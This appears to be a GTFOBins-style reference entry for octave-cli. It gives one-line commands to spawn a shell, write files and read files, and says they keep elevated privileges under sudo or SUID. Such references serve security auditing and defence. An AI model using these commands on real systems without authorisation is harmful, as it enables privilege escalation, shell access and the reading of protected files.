octave
Shell
This executable can spawn an interactive system shell.
- This function can be performed by any unprivileged user.
octave-cli --eval 'system("/bin/sh")'This function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.octave-cli --eval 'system("/bin/sh")'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.octave-cli --eval 'system("/bin/sh")'
File write
This executable can write data to local files.
- This function can be performed by any unprivileged user.
octave-cli --eval 'fid = fopen("/path/to/output-file", "w"); fputs(fid, "DATA"); fclose(fid);'This function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.octave-cli --eval 'fid = fopen("/path/to/output-file", "w"); fputs(fid, "DATA"); fclose(fid);'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.octave-cli --eval 'fid = fopen("/path/to/output-file", "w"); fputs(fid, "DATA"); fclose(fid);'
File read
This executable can read data from local files.
- This function can be performed by any unprivileged user.
octave-cli --eval 'format none; fid = fopen("/path/to/input-file"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'This function is performed by the privileged user if executed viasudobecause the acquired privileges are not dropped.octave-cli --eval 'format none; fid = fopen("/path/to/input-file"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'This function is performed by the privileged user if the executable has the SUID bit set and the right ownership because the effective privileges are not dropped.octave-cli --eval 'format none; fid = fopen("/path/to/input-file"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'